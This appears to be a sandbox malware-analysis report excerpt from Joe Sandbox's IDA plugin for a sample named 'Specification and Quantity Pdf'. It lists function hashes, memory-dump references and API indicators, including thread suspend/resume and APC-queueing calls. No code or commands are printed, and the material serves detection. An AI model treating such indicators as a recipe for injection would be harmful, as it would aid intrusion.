            • Instruction ID: 5a3ecb3fe561c65dfa9acdb6a7faf22db6aa34e407149261de9c3514eb3ae977
            • Opcode Fuzzy Hash: c1d6c5c74579766a181c76732d0e982c6beea5bccfddb835f43d11907d24d000
            • Instruction Fuzzy Hash: 4961E423B3AF8549D997DB759090668E259BF667C1F948332ED4F33780EF3DA1928210
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3c5e064a75470d3b12434700b37e535a9a449cf43c98d28f8e1c4881788e2503
            • Instruction ID: 17b34a5ff1f92d65da477f7c34cf63dd639c787216b4f2abff418a0175718b96
            • Opcode Fuzzy Hash: 3c5e064a75470d3b12434700b37e535a9a449cf43c98d28f8e1c4881788e2503
            • Instruction Fuzzy Hash: 80512623A396819AE794EF66D8445B9B7A0EF58B84F888135FE4D93B44EF3CD941C310
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 037180d382d50411797ef5447beba6102d2d9aae5c3127ec27b5573139ad0381
            • Instruction ID: c80746d80f2f72b5edd9adf3a3b21ec8599d3e2683a1909b620175d306e45bf2
            • Opcode Fuzzy Hash: 037180d382d50411797ef5447beba6102d2d9aae5c3127ec27b5573139ad0381
            • Instruction Fuzzy Hash: 04610633E38B8145D696D7649441978F29ABF817C5BD49332ED4F72290DF3EA1A2C710
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 096d27cd634f33b2b39273a113a3bfa11cc36e2ee31c477455c3f03cc6ef90c3
            • Instruction ID: 329e6defa85e47add70e6f519b632d1988949f2898380c48e6579884d5c6faa7
            • Opcode Fuzzy Hash: 096d27cd634f33b2b39273a113a3bfa11cc36e2ee31c477455c3f03cc6ef90c3
            • Instruction Fuzzy Hash: D361BD33B38B5582DA80AF49E4402E9F761FB44BA0F899232DAAE67794CF7CD551C310
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8488435c80d20a63b5b51d94c773dc6c83ce4d876cdd784b59539f6ecbcefddf
            • Instruction ID: a582813289521573d2ed9997aaed9187d2a6880e7bdca7c3a50eaef529f27352
            • Opcode Fuzzy Hash: 8488435c80d20a63b5b51d94c773dc6c83ce4d876cdd784b59539f6ecbcefddf
            • Instruction Fuzzy Hash: 6B515273B3C50285EEA4BB66D8542B8A250AF94FC4F944032DA5E5F7E5DF2CE8458320
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9f371b7c663320aac0712d55089f2ff7daf330af024b6290ddde3f6ee4752e1a
            • Instruction ID: 022a334bf5019931644b8b4fa5eaf4930514d06a025b508628da6f1056d86d60
            • Opcode Fuzzy Hash: 9f371b7c663320aac0712d55089f2ff7daf330af024b6290ddde3f6ee4752e1a
            • Instruction Fuzzy Hash: 1F419D67B38A8A86EE40DF56D4441A8B361F748BC0BC99032DE1E67755DF3CE562C310
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f369d52a6617cb0b410c6854dde9fc91c82fa898c3b7573e9b41fa6fd70f80a6
            • Instruction ID: a2851075196e308d2a9202a1edbdb89ac66fb6875e29520d0677e7dba8a4bfbf
            • Opcode Fuzzy Hash: f369d52a6617cb0b410c6854dde9fc91c82fa898c3b7573e9b41fa6fd70f80a6
            • Instruction Fuzzy Hash: B731F223F3C15286EAD4BA669C441B99661AF84BC4FE48035ED1EA77D6DF2CEC418360
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ed14c80dd863059f2dff2c32daa8a57b105c1426a02afba91e4b980da70f0663
            • Instruction ID: a44108be7c0ed2c3e7f8fa5c5c0e1f9aee358f3ced86198626f9d35d105d4ca1
            • Opcode Fuzzy Hash: ed14c80dd863059f2dff2c32daa8a57b105c1426a02afba91e4b980da70f0663
            • Instruction Fuzzy Hash: 3541BC33B14BA489E715CFB5E8406ED77B5BB48348F65812AEE8CA7A08DF34C592C700
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3168844106-0
            • Opcode ID: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
            • Instruction ID: 525f7b3de7d72b1d702acf16d781593de37e5e779e5600e66d3ee6c20a48aa83
            • Opcode Fuzzy Hash: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
            • Instruction Fuzzy Hash: A3218A23B3865242FBE4AB69A2D66BE5391DB85780F846031DE0E13FC6DD2DD5914A10
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e58d2d3fb35aab4af4c2e43eeb53387022bca1717b85e2f8311d2cb9bfc17508
            • Instruction ID: c38c1c93bc9ce4d67fab94b3a71645c2283c0720925c490f219af930af07308d
            • Opcode Fuzzy Hash: e58d2d3fb35aab4af4c2e43eeb53387022bca1717b85e2f8311d2cb9bfc17508
            • Instruction Fuzzy Hash: 6B112763B2964685E655BF52F8811BAD351AF857D0F988432EF0C5B785CE3CD481C350
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8062c5b0bfe5bc4dfaf79245516a6f0a8f2a6c954b61e061f0a9d370f9ed3bdd
            • Instruction ID: b74c9156d319a549e216d728992873fe6900482b16159f5276e238170501463b
            • Opcode Fuzzy Hash: 8062c5b0bfe5bc4dfaf79245516a6f0a8f2a6c954b61e061f0a9d370f9ed3bdd
            • Instruction Fuzzy Hash: C3F03A02F3900A45F98CBA72582A2BAC2A10F97B80FE06831F91E7B7C7DD1C941213A4
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 13412aaf4960266ba0ca3712be346c71a13c8dc86ffbd22705df66a78fb92546
            • Instruction ID: 123da8899c882806f26eba6b22875e8bf54ea835bbfa836712c30326ebd2efcf
            • Opcode Fuzzy Hash: 13412aaf4960266ba0ca3712be346c71a13c8dc86ffbd22705df66a78fb92546
            • Instruction Fuzzy Hash: 9CE04F06F3910A05F98CBAA258662FAC1611FA6780FE46431FA1E77BD7DD2CA41153A0
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e8fe89d949a41ba888f42414d67c881266776e3cb583dd9942f77cc6f741983c
            • Instruction ID: 7eada74ea627253887c508ac8cdf5ffdcf07464c401c6a2f1e1075d59dcd00a1
            • Opcode Fuzzy Hash: e8fe89d949a41ba888f42414d67c881266776e3cb583dd9942f77cc6f741983c
            • Instruction Fuzzy Hash: 6ED05205F3801A00EC88BA634C290BAC2600F66BC0EE42172AD0EBBB969E0CA4124358
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: _stricmp
            • String ID: buddhist$calendar$dangi$gregorian$hebrew$islamic$islamic-umalqura$japanese$persian$roc
            • API String ID: 2884411883-3649728362
            • Opcode ID: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
            • Instruction ID: 0ca44a3683b0d32ab59a9b88caabe265103662a8e6674e8c34cdd819123f7552
            • Opcode Fuzzy Hash: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
            • Instruction Fuzzy Hash: 94515027E3C68391EAD1BB55E8143B5E3A4EF96784FC12032DC8E66694EF6CE405D360
            APIs
            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C1DE
            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C206
            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C226
            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C246
            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C266
            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C28A
            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C2AE
            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C2D2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: strcmp
            • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
            • API String ID: 1004003707-945519297
            • Opcode ID: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
            • Instruction ID: 1c932033ea3512299f29849a8295e210f1b3388cff807e6c523b8dda78d24987
            • Opcode Fuzzy Hash: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
            • Instruction Fuzzy Hash: EC413A66F3C64240E9D0BB55A9401B5D261AF417F4FD84332D8BD776E5EF1CE9428270
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
            • String ID: InitializeContext2$kernel32.dll
            • API String ID: 4102459504-3117029998
            • Opcode ID: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
            • Instruction ID: 8cfb7f31477d77feefbffe6a4e2243bcb6d9d0d44f1a7df4555ccacfd5005955
            • Opcode Fuzzy Hash: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
            • Instruction Fuzzy Hash: FC318C23B3CB5682EA90AF95A440279F790EF44791F980432DD9D627A4DF7CE486C720
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
            • String ID: QueueUserAPC2$kernel32
            • API String ID: 3714266957-4022151419
            • Opcode ID: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
            • Instruction ID: caaf3d86a6355c8503bfca3ec10eedcff768fe70c921cf2f5b495dacc0928688
            • Opcode Fuzzy Hash: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
            • Instruction Fuzzy Hash: 6E318862B3CA4281EAD0AB55E840379A391EF45BE4FE41231D96D667D4DF2CE4458720
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
